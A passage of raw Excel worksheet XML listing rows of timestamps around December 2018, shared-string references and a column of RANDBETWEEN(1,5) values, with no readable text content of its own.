    </row>
    <row r="5668" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5668" s="1">
        <v>43449.060219907406</v>
      </c>
      <c r="C5668" t="s">
        <v>10</v>
      </c>
      <c r="D5668" t="s">
        <v>6</v>
      </c>
      <c r="E5668" t="s">
        <v>776</v>
      </c>
      <c r="F5668">
        <f t="shared" ca="1" si="88"/>
        <v>2</v>
      </c>
    </row>
    <row r="5669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5669" s="1">
        <v>43449.06</v>
      </c>
      <c r="C5669" t="s">
        <v>10</v>
      </c>
      <c r="D5669" t="s">
        <v>36</v>
      </c>
      <c r="E5669" t="s">
        <v>5247</v>
      </c>
      <c r="F5669">
        <f t="shared" ca="1" si="88"/>
        <v>2</v>
      </c>
    </row>
    <row r="5670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5670" s="1">
        <v>43449.052141203705</v>
      </c>
      <c r="C5670" t="s">
        <v>10</v>
      </c>
      <c r="D5670" t="s">
        <v>36</v>
      </c>
      <c r="E5670" t="s">
        <v>5242</v>
      </c>
      <c r="F5670">
        <f t="shared" ca="1" si="88"/>
        <v>5</v>
      </c>
    </row>
    <row r="5671" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5671" s="1">
        <v>43449.050324074073</v>
      </c>
      <c r="C5671" t="s">
        <v>2108</v>
      </c>
      <c r="E5671" t="s">
        <v>5248</v>
      </c>
      <c r="F5671">
        <f t="shared" ca="1" si="88"/>
        <v>5</v>
      </c>
    </row>
    <row r="5672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5672" s="1">
        <v>43449.026238425926</v>
      </c>
      <c r="C5672" t="s">
        <v>10</v>
      </c>
      <c r="D5672" t="s">
        <v>6</v>
      </c>
      <c r="E5672" t="s">
        <v>5249</v>
      </c>
      <c r="F5672">
        <f t="shared" ca="1" si="88"/>
        <v>4</v>
      </c>
    </row>
    <row r="5673" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5673" s="1">
        <v>43449.026018518518</v>
      </c>
      <c r="C5673" t="s">
        <v>10</v>
      </c>
      <c r="D5673" t="s">
        <v>6</v>
      </c>
      <c r="E5673" t="s">
        <v>5243</v>
      </c>
      <c r="F5673">
        <f t="shared" ca="1" si="88"/>
        <v>3</v>
      </c>
    </row>
    <row r="5674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5674" s="1">
        <v>43449.018564814818</v>
      </c>
      <c r="C5674" t="s">
        <v>10</v>
      </c>
      <c r="D5674" t="s">
        <v>6</v>
      </c>
      <c r="E5674" t="s">
        <v>776</v>
      </c>
      <c r="F5674">
        <f t="shared" ca="1" si="88"/>
        <v>5</v>
      </c>
    </row>
    <row r="5675" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5675" s="1">
        <v>43449.011087962965</v>
      </c>
      <c r="C5675" t="s">
        <v>92</v>
      </c>
      <c r="E5675" t="s">
        <v>5250</v>
      </c>
      <c r="F5675">
        <f t="shared" ca="1" si="88"/>
        <v>4</v>
      </c>
    </row>
    <row r="5676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5676" s="1">
        <v>43448.749479166669</v>
      </c>
      <c r="C5676" t="s">
        <v>10</v>
      </c>
      <c r="D5676" t="s">
        <v>33</v>
      </c>
      <c r="F5676">
        <f t="shared" ca="1" si="88"/>
        <v>2</v>
      </c>
    </row>
    <row r="5677" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5677" s="1">
        <v>43448.748541666668</v>
      </c>
      <c r="C5677" t="s">
        <v>10</v>
      </c>
      <c r="D5677" t="s">
        <v>33</v>
      </c>
      <c r="F5677">
        <f t="shared" ca="1" si="88"/>
        <v>4</v>
      </c>
    </row>
    <row r="5678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5678" s="1">
        <v>43448.698506944442</v>
      </c>
      <c r="C5678" t="s">
        <v>6</v>
      </c>
      <c r="D5678" t="s">
        <v>821</v>
      </c>
      <c r="E5678" t="s">
        <v>5251</v>
      </c>
      <c r="F5678">
        <f t="shared" ca="1" si="88"/>
        <v>3</v>
      </c>
    </row>
    <row r="5679" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5679" s="1">
        <v>43448.690833333334</v>
      </c>
      <c r="C5679" t="s">
        <v>10</v>
      </c>
      <c r="D5679" t="s">
        <v>36</v>
      </c>
      <c r="E5679" t="s">
        <v>5252</v>
      </c>
      <c r="F5679">
        <f t="shared" ca="1" si="88"/>
        <v>3</v>
      </c>
    </row>
    <row r="5680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5680" s="1">
        <v>43448.664120370369</v>
      </c>
      <c r="C5680" t="s">
        <v>60</v>
      </c>
      <c r="E5680" t="s">
        <v>5253</v>
      </c>
      <c r="F5680">
        <f t="shared" ca="1" si="88"/>
        <v>3</v>
      </c>
    </row>
    <row r="5681" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5681" s="1">
        <v>43448.649918981479</v>
      </c>
      <c r="C5681" t="s">
        <v>10</v>
      </c>
      <c r="D5681" t="s">
        <v>89</v>
      </c>
      <c r="E5681" s="2" t="s">
        <v>5254</v>
      </c>
      <c r="F5681">
        <f t="shared" ca="1" si="88"/>
        <v>1</v>
      </c>
    </row>
    <row r="5682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5682" s="1">
        <v>43448.644212962965</v>
      </c>
      <c r="C5682" t="s">
        <v>243</v>
      </c>
      <c r="E5682" t="s">
        <v>5255</v>
      </c>
      <c r="F5682">
        <f t="shared" ca="1" si="88"/>
        <v>2</v>
      </c>
    </row>
    <row r="5683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5683" s="1">
        <v>43448.641851851855</v>
      </c>
      <c r="C5683" t="s">
        <v>260</v>
      </c>
      <c r="E5683" t="s">
        <v>5256</v>
      </c>
      <c r="F5683">
        <f t="shared" ca="1" si="88"/>
        <v>4</v>
      </c>
    </row>
    <row r="5684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5684" s="1">
        <v>43448.640081018515</v>
      </c>
      <c r="C5684" t="s">
        <v>10</v>
      </c>
      <c r="D5684" t="s">
        <v>46</v>
      </c>
      <c r="E5684" t="s">
        <v>5257</v>
      </c>
      <c r="F5684">
        <f t="shared" ca="1" si="88"/>
        <v>2</v>
      </c>
    </row>
    <row r="5685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5685" s="1">
        <v>43448.588634259257</v>
      </c>
      <c r="C5685" t="s">
        <v>1510</v>
      </c>
      <c r="F5685">
        <f t="shared" ca="1" si="88"/>
        <v>1</v>
      </c>
    </row>
    <row r="5686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5686" s="1">
        <v>43448.587870370371</v>
      </c>
      <c r="C5686" t="s">
        <v>1510</v>
      </c>
      <c r="F5686">
        <f t="shared" ca="1" si="88"/>
        <v>3</v>
      </c>
    </row>
    <row r="5687" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5687" s="1">
        <v>43448.58321759259</v>
      </c>
      <c r="C5687" t="s">
        <v>1510</v>
      </c>
      <c r="F5687">
        <f t="shared" ca="1" si="88"/>
        <v>2</v>
      </c>
    </row>
    <row r="5688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5688" s="1">
        <v>43448.581319444442</v>
      </c>
      <c r="C5688" t="s">
        <v>1510</v>
      </c>
      <c r="F5688">
        <f t="shared" ca="1" si="88"/>
        <v>1</v>
      </c>
    </row>
    <row r="5689" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5689" s="1">
        <v>43448.566157407404</v>
      </c>
      <c r="C5689" t="s">
        <v>10</v>
      </c>
      <c r="D5689" t="s">
        <v>232</v>
      </c>
      <c r="E5689" s="2" t="s">
        <v>5258</v>
      </c>
      <c r="F5689">
        <f t="shared" ca="1" si="88"/>
        <v>4</v>
      </c>
    </row>
    <row r="5690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5690" s="1">
        <v>43448.556770833333</v>
      </c>
      <c r="C5690" t="s">
        <v>10</v>
      </c>
      <c r="D5690" t="s">
        <v>374</v>
      </c>
      <c r="E5690" t="s">
        <v>5259</v>
      </c>
      <c r="F5690">
        <f t="shared" ca="1" si="88"/>
        <v>4</v>
      </c>
    </row>
    <row r="5691" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5691" s="1">
        <v>43448.55572916667</v>
      </c>
      <c r="C5691" t="s">
        <v>471</v>
      </c>
      <c r="D5691" t="s">
        <v>312</v>
      </c>
      <c r="E5691" s="2" t="s">
        <v>5260</v>
      </c>
      <c r="F5691">
        <f t="shared" ca="1" si="88"/>
        <v>4</v>
      </c>
    </row>
    <row r="5692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5692" s="1">
        <v>43448.55400462963</v>
      </c>
      <c r="B5692" t="s">
        <v>19</v>
      </c>
      <c r="C5692" t="s">
        <v>10</v>
      </c>
      <c r="D5692" t="s">
        <v>23</v>
      </c>
      <c r="E5692" t="s">
        <v>28</v>
      </c>
      <c r="F5692">
        <f t="shared" ca="1" si="88"/>
        <v>3</v>
      </c>
    </row>
    <row r="5693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5693" s="1">
        <v>43448.539826388886</v>
      </c>
      <c r="C5693" t="s">
        <v>10</v>
      </c>
      <c r="D5693" t="s">
        <v>192</v>
      </c>
      <c r="E5693" t="s">
        <v>5261</v>
      </c>
      <c r="F5693">
        <f t="shared" ca="1" si="88"/>
        <v>3</v>
      </c>
    </row>
    <row r="5694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5694" s="1">
        <v>43448.531458333331</v>
      </c>
      <c r="C5694" t="s">
        <v>10</v>
      </c>
      <c r="D5694" t="s">
        <v>92</v>
      </c>
      <c r="E5694" t="s">
        <v>5262</v>
      </c>
      <c r="F5694">
        <f t="shared" ca="1" si="88"/>
        <v>4</v>
      </c>
    </row>
    <row r="5695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5695" s="1">
        <v>43448.523842592593</v>
      </c>
      <c r="C5695" t="s">
        <v>10</v>
      </c>
      <c r="D5695" t="s">
        <v>271</v>
      </c>
      <c r="E5695" t="s">
        <v>5263</v>
      </c>
      <c r="F5695">
        <f t="shared" ca="1" si="88"/>
        <v>2</v>
      </c>
    </row>
    <row r="5696" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5696" s="1">
        <v>43448.514502314814</v>
      </c>
      <c r="C5696" t="s">
        <v>16</v>
      </c>
      <c r="D5696" t="s">
        <v>312</v>
      </c>
      <c r="E5696" s="2" t="s">
        <v>5264</v>
      </c>
      <c r="F5696">
        <f t="shared" ca="1" si="88"/>
        <v>1</v>
      </c>
    </row>
    <row r="5697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5697" s="1">
        <v>43448.496770833335</v>
      </c>
      <c r="C5697" t="s">
        <v>10</v>
      </c>
      <c r="D5697" t="s">
        <v>6</v>
      </c>
      <c r="E5697" t="s">
        <v>5265</v>
      </c>
      <c r="F5697">
        <f t="shared" ca="1" si="88"/>
        <v>5</v>
      </c>
    </row>
    <row r="5698" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5698" s="1">
        <v>43448.496412037035</v>
      </c>
      <c r="C5698" t="s">
        <v>6</v>
      </c>
      <c r="D5698" t="s">
        <v>602</v>
      </c>
      <c r="E5698" t="s">
        <v>5266</v>
      </c>
      <c r="F5698">
        <f t="shared" ref="F5698:F5761" ca="1" si="89">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="5699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5699" s="1">
        <v>43448.489178240743</v>
      </c>
      <c r="C5699" t="s">
        <v>10</v>
      </c>
      <c r="D5699" t="s">
        <v>336</v>
      </c>
      <c r="E5699" t="s">
        <v>5267</v>
      </c>
      <c r="F5699">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5700" s="1">
        <v>43448.487442129626</v>
      </c>
      <c r="C5700" t="s">
        <v>6</v>
      </c>
      <c r="D5700" t="s">
        <v>114</v>
      </c>
      <c r="E5700" t="s">
        <v>5268</v>
      </c>
      <c r="F5700">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5701" s="1">
        <v>43448.472939814812</v>
      </c>
      <c r="C5701" t="s">
        <v>10</v>
      </c>
      <c r="D5701" t="s">
        <v>17</v>
      </c>
      <c r="E5701" t="s">
        <v>5269</v>
      </c>
      <c r="F5701">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5702" s="1">
        <v>43448.471203703702</v>
      </c>
      <c r="C5702" t="s">
        <v>60</v>
      </c>
      <c r="E5702">
        <v>791574462</v>
      </c>
      <c r="F5702">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5703" s="1">
        <v>43448.46675925926</v>
      </c>
      <c r="C5703" t="s">
        <v>10</v>
      </c>
      <c r="D5703" t="s">
        <v>192</v>
      </c>
      <c r="E5703" t="s">
        <v>5270</v>
      </c>
      <c r="F5703">
        <f t="shared" ca="1" si="89"/>
        <v>4</v>
      </c>
    </row>
    <row r="5704" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A5704" s="1">
        <v>43448.44159722222</v>
      </c>
      <c r="C5704" t="s">
        <v>41</v>
      </c>
      <c r="E5704" s="2" t="s">
        <v>5271</v>
      </c>
      <c r="F5704">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5705" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5705" s="1">
        <v>43448.438310185185</v>
      </c>
      <c r="C5705" t="s">
        <v>10</v>
      </c>
      <c r="D5705" t="s">
        <v>20</v>
      </c>
      <c r="E5705" t="s">
        <v>5272</v>
      </c>
      <c r="F5705">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5706" s="1">
        <v>43448.420497685183</v>
      </c>
      <c r="C5706" t="s">
        <v>48</v>
      </c>
      <c r="E5706" t="s">
        <v>5273</v>
      </c>
      <c r="F5706">
        <f t="shared" ca="1" si="89"/>
        <v>1</v>
      </c>
    </row>
    <row r="5707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5707" s="1">
        <v>43448.399456018517</v>
      </c>
      <c r="C5707" t="s">
        <v>6</v>
      </c>
      <c r="D5707" t="s">
        <v>25</v>
      </c>
      <c r="E5707" t="s">
        <v>5274</v>
      </c>
      <c r="F5707">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5708" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5708" s="1">
        <v>43448.395740740743</v>
      </c>
      <c r="C5708" t="s">
        <v>65</v>
      </c>
      <c r="E5708" s="2" t="s">
        <v>5275</v>
      </c>
      <c r="F5708">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5709" s="1">
        <v>43448.389699074076</v>
      </c>
      <c r="C5709" t="s">
        <v>60</v>
      </c>
      <c r="E5709" t="s">
        <v>5276</v>
      </c>
      <c r="F5709">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5710" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5710" s="1">
        <v>43448.387789351851</v>
      </c>
      <c r="C5710" t="s">
        <v>10</v>
      </c>
      <c r="D5710" t="s">
        <v>112</v>
      </c>
      <c r="E5710" s="2" t="s">
        <v>5277</v>
      </c>
      <c r="F5710">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5711" s="1">
        <v>43448.386053240742</v>
      </c>
      <c r="C5711" t="s">
        <v>10</v>
      </c>
      <c r="D5711" t="s">
        <v>23</v>
      </c>
      <c r="E5711" t="s">
        <v>5278</v>
      </c>
      <c r="F5711">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5712" s="1">
        <v>43448.382685185185</v>
      </c>
      <c r="C5712" t="s">
        <v>60</v>
      </c>
      <c r="E5712" t="s">
        <v>5279</v>
      </c>
      <c r="F5712">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5713" s="1">
        <v>43448.377025462964</v>
      </c>
      <c r="C5713" t="s">
        <v>10</v>
      </c>
      <c r="D5713" t="s">
        <v>192</v>
      </c>
      <c r="E5713" t="s">
        <v>5280</v>
      </c>
      <c r="F5713">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5714" s="1">
        <v>43448.350590277776</v>
      </c>
      <c r="C5714" t="s">
        <v>10</v>
      </c>
      <c r="D5714" t="s">
        <v>56</v>
      </c>
      <c r="E5714" t="s">
        <v>5281</v>
      </c>
      <c r="F5714">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5715" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5715" s="1">
        <v>43448.288287037038</v>
      </c>
      <c r="C5715" t="s">
        <v>71</v>
      </c>
      <c r="E5715" s="2" t="s">
        <v>5282</v>
      </c>
      <c r="F5715">
        <f t="shared" ca="1" si="89"/>
        <v>1</v>
      </c>
    </row>
    <row r="5716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5716" s="1">
        <v>43448.272731481484</v>
      </c>
      <c r="C5716" t="s">
        <v>60</v>
      </c>
      <c r="E5716" t="s">
        <v>5283</v>
      </c>
      <c r="F5716">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5717" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5717" s="1">
        <v>43448.260034722225</v>
      </c>
      <c r="C5717" t="s">
        <v>318</v>
      </c>
      <c r="E5717" t="s">
        <v>5284</v>
      </c>
      <c r="F5717">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5718" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5718" s="1">
        <v>43448.259432870371</v>
      </c>
      <c r="C5718" t="s">
        <v>318</v>
      </c>
      <c r="E5718" t="s">
        <v>5284</v>
      </c>
      <c r="F5718">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5719" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A5719" s="1">
        <v>43448.258252314816</v>
      </c>
      <c r="C5719" t="s">
        <v>65</v>
      </c>
      <c r="E5719" s="2" t="s">
        <v>5285</v>
      </c>
      <c r="F5719">
        <f t="shared" ca="1" si="89"/>
        <v>4</v>
      </c>
    </row>
    <row r="5720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5720" s="1">
        <v>43448.235289351855</v>
      </c>
      <c r="C5720" t="s">
        <v>41</v>
      </c>
      <c r="E5720" t="s">
        <v>5286</v>
      </c>
      <c r="F5720">
        <f t="shared" ca="1" si="89"/>
        <v>4</v>
      </c>
    </row>
    <row r="5721" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A5721" s="1">
        <v>43448.223240740743</v>
      </c>
      <c r="C5721" t="s">
        <v>71</v>
      </c>
      <c r="E5721" s="2" t="s">
        <v>5287</v>
      </c>
      <c r="F5721">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5722" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5722" s="1">
        <v>43448.212314814817</v>
      </c>
      <c r="C5722" t="s">
        <v>60</v>
      </c>
      <c r="E5722" t="s">
        <v>5288</v>
      </c>
      <c r="F5722">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5723" s="1">
        <v>43448.193854166668</v>
      </c>
      <c r="C5723" t="s">
        <v>60</v>
      </c>
      <c r="E5723" t="s">
        <v>5289</v>
      </c>
      <c r="F5723">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5724" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5724" s="1">
        <v>43448.191238425927</v>
      </c>
      <c r="C5724" t="s">
        <v>301</v>
      </c>
      <c r="E5724">
        <v>558762363</v>
      </c>
      <c r="F5724">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5725" s="1">
        <v>43448.191030092596</v>
      </c>
      <c r="C5725" t="s">
        <v>301</v>
      </c>
      <c r="F5725">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5726" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A5726" s="1">
        <v>43448.154594907406</v>
      </c>
      <c r="C5726" t="s">
        <v>73</v>
      </c>
      <c r="E5726" s="2" t="s">
        <v>5290</v>
      </c>
      <c r="F5726">
        <f t="shared" ca="1" si="89"/>
        <v>4</v>
      </c>
    </row>
    <row r="5727" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5727" s="1">
        <v>43448.151759259257</v>
      </c>
      <c r="C5727" t="s">
        <v>314</v>
      </c>
      <c r="E5727" t="s">
        <v>5291</v>
      </c>
      <c r="F5727">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5728" s="1">
        <v>43448.151458333334</v>
      </c>
      <c r="C5728" t="s">
        <v>127</v>
      </c>
      <c r="E5728" t="s">
        <v>5292</v>
      </c>
      <c r="F5728">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5729" s="1">
        <v>43448.148865740739</v>
      </c>
      <c r="C5729" t="s">
        <v>173</v>
      </c>
      <c r="E5729" t="s">
        <v>5293</v>
      </c>
      <c r="F5729">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5730" s="1">
        <v>43448.081319444442</v>
      </c>
      <c r="C5730" t="s">
        <v>808</v>
      </c>
      <c r="E5730" t="s">
        <v>5294</v>
      </c>
      <c r="F5730">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5731" s="1">
        <v>43448.079780092594</v>
      </c>
      <c r="C5731" t="s">
        <v>2082</v>
      </c>
      <c r="F5731">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5732" s="1">
        <v>43448.076180555552</v>
      </c>
      <c r="C5732" t="s">
        <v>10</v>
      </c>
      <c r="D5732" t="s">
        <v>36</v>
      </c>
      <c r="E5732" t="s">
        <v>5295</v>
      </c>
      <c r="F5732">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5733" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5733" s="1">
        <v>43448.073541666665</v>
      </c>
      <c r="C5733" t="s">
        <v>6</v>
      </c>
      <c r="D5733" t="s">
        <v>194</v>
      </c>
      <c r="E5733" t="s">
        <v>4116</v>
      </c>
      <c r="F5733">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5734" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5734" s="1">
        <v>43448.069305555553</v>
      </c>
      <c r="C5734" t="s">
        <v>226</v>
      </c>
      <c r="E5734" t="s">
        <v>5296</v>
      </c>
      <c r="F5734">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5735" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5735" s="1">
        <v>43448.06726851852</v>
      </c>
      <c r="C5735" t="s">
        <v>10</v>
      </c>
      <c r="D5735" t="s">
        <v>36</v>
      </c>
      <c r="E5735" t="s">
        <v>5297</v>
      </c>
      <c r="F5735">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5736" s="1">
        <v>43448.061261574076</v>
      </c>
      <c r="C5736" t="s">
        <v>10</v>
      </c>
      <c r="D5736" t="s">
        <v>36</v>
      </c>
      <c r="E5736" t="s">
        <v>5298</v>
      </c>
      <c r="F5736">
        <f t="shared" ca="1" si="89"/>
        <v>4</v>
      </c>
    </row>
    <row r="5737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5737" s="1">
        <v>43448.05909722222</v>
      </c>
      <c r="C5737" t="s">
        <v>226</v>
      </c>
      <c r="E5737" t="s">
        <v>5299</v>
      </c>
      <c r="F5737">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5738" s="1">
        <v>43448.051539351851</v>
      </c>
      <c r="C5738" t="s">
        <v>1130</v>
      </c>
      <c r="F5738">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5739" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5739" s="1">
        <v>43448.051516203705</v>
      </c>
      <c r="C5739" t="s">
        <v>1130</v>
      </c>
      <c r="F5739">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5740" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5740" s="1">
        <v>43448.046539351853</v>
      </c>
      <c r="C5740" t="s">
        <v>10</v>
      </c>
      <c r="D5740" t="s">
        <v>6</v>
      </c>
      <c r="E5740" t="s">
        <v>776</v>
      </c>
      <c r="F5740">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5741" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5741" s="1">
        <v>43448.043749999997</v>
      </c>
      <c r="C5741" t="s">
        <v>2082</v>
      </c>
      <c r="F5741">
        <f t="shared" ca="1" si="89"/>
        <v>1</v>
      </c>
    </row>
    <row r="5742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5742" s="1">
        <v>43448.03665509259</v>
      </c>
      <c r="C5742" t="s">
        <v>253</v>
      </c>
      <c r="E5742" t="s">
        <v>5300</v>
      </c>
      <c r="F5742">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5743" s="1">
        <v>43448.035081018519</v>
      </c>
      <c r="C5743" t="s">
        <v>2082</v>
      </c>
      <c r="F5743">
        <f t="shared" ca="1" si="89"/>
        <v>4</v>
      </c>
    </row>
    <row r="5744" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5744" s="1">
        <v>43448.030300925922</v>
      </c>
      <c r="C5744" t="s">
        <v>226</v>
      </c>
      <c r="E5744" t="s">
        <v>5068</v>
      </c>
      <c r="F5744">
        <f t="shared" ca="1" si="89"/>
        <v>4</v>
      </c>
    </row>
    <row r="5745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5745" s="1">
        <v>43448.025381944448</v>
      </c>
      <c r="C5745" t="s">
        <v>10</v>
      </c>
      <c r="D5745" t="s">
        <v>36</v>
      </c>
      <c r="E5745" t="s">
        <v>5301</v>
      </c>
      <c r="F5745">
        <f t="shared" ca="1" si="89"/>
        <v>3</v>
      </c>
    </row>
    <row r="5746" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5746" s="1">
        <v>43448.017025462963</v>
      </c>
      <c r="C5746" t="s">
        <v>10</v>
      </c>
      <c r="D5746" t="s">
        <v>6</v>
      </c>
      <c r="E5746" t="s">
        <v>5302</v>
      </c>
      <c r="F5746">
        <f t="shared" ca="1" si="89"/>
        <v>2</v>
      </c>
    </row>
    <row r="5747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5747" s="1">
        <v>43448.014409722222</v>
      </c>
      <c r="C5747" t="s">
        <v>2108</v>
      </c>
      <c r="E5747" t="s">
        <v>776</v>
      </c>
      <c r="F5747">
        <f t="shared" ca="1" si="89"/>
        <v>5</v>
      </c>
    </row>
    <row r="5748" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5748" s="1">
        <v>43448.01321759259</v>
      </c>
      <c r="C5748" t="s">
        <v>226</v>
      </c>
      <c r="E5748" t="s">
        <v>5068</v>
      </c>
      <c r="F5748">
        <f t="shared" ca="1" si="89"/>
        <v>1</v>
      </c>
    </row>
    <row r="5749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5749" s="1">
        <v>43448.005358796298</v>
      </c>
      <c r="C5749" t="s">
        <v>140</v>
      </c>
      <c r="D5749" t="s">
        <v>141</v>
      </c>
      <c r="E5749" t="s">
        <v>5303</v>
      </c>
      <c r="F5749">
        <f t="shared" ca="1" si="89"/>
        <v>1</v>
      </c>
    </row>
    <row r="5750" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A5750" s="1">
